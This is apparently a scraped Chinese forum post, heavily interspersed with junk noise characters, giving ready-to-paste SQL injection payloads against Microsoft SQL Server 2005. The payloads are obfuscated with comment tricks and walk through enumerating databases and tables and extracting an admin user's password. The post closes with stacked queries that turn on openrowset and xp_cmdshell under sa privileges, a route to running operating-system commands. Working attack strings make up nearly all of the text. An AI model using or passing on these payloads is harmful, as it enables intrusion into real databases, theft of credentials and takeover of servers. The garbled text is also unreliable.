4 R' `- Q" K' g6 I( V, H$ r
; C, D! g6 l7 h) g
" M6 i2 }- d/ n- e6 w[Copy to clipboard]CODE:
+ B% A! L0 e( }8 `( h/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
& q6 ]9 Z& N( x3 o% O2 o! S8 S* P. R, O C6 h1 e4 J
爆表语句,somedb部份是所要列的数据库,红色数字1累加6 \2 ^3 n9 w5 n! H+ K s
8 G6 z$ k- R1 T9 H# r+ f& c# m$ \: n+ R/ p7 G
[Copy to clipboard]CODE:. W% n L: S) E. O6 S/ q/ J
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--1 l/ Z. e- E* _$ _6 d
j1 ]/ }; ~, h) ]爆字段语句,爆表admin里user='icerover'的密码段
- d& G, J j1 ?2 P
' @2 ?% Z! w% N" ^) ]) u2 A0 u, }# X8 f/ ]" `( }! y
[Copy to clipboard]CODE:
. M, ?5 {, Z# j4 d& ^# \" H5 f**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--
1 p5 S! d: o$ w/ v, R# T0 M' _* S$ u
mssql2005默认没有开xp_cmdshell的,openrowset也不能用' l( ]/ T! r$ I8 T
如果是sa权限,可以这样来开启
# Q( x, t+ D* b' J- k. c- x D0 c5 Q开启openrowset6 f8 m" `- J5 c8 d, p7 _& L
+ u9 s! U7 H% e; H9 ?2 S! T4 P& H5 M/ K! O. ]
[Copy to clipboard]CODE:
7 t W! m k& ^7 q5 r+ b/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--/ R# K" e! P& l* t
/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
; @- N% c7 x. y& u {
& R5 [0 C' Q6 @# a, f/ O3 [" Y( p开启xp_cmdshell
+ |/ r4 }" ]* S; _- b' H" t
) t8 V, x" O P6 M
6 n: m# T" E$ N6 @ F' {5 N: y[Copy to clipboard]CODE:
( M* K. ~; l5 U, r, i' vEXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
0 q0 @- {( _7 e1 gEXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--( ^. k! q+ {6 H% ~
% S# W+ e6 O7 E0 S# V8 m: p5 S
ok,over~~晚安% S$ I# e9 A& t) K6 I% U l w
|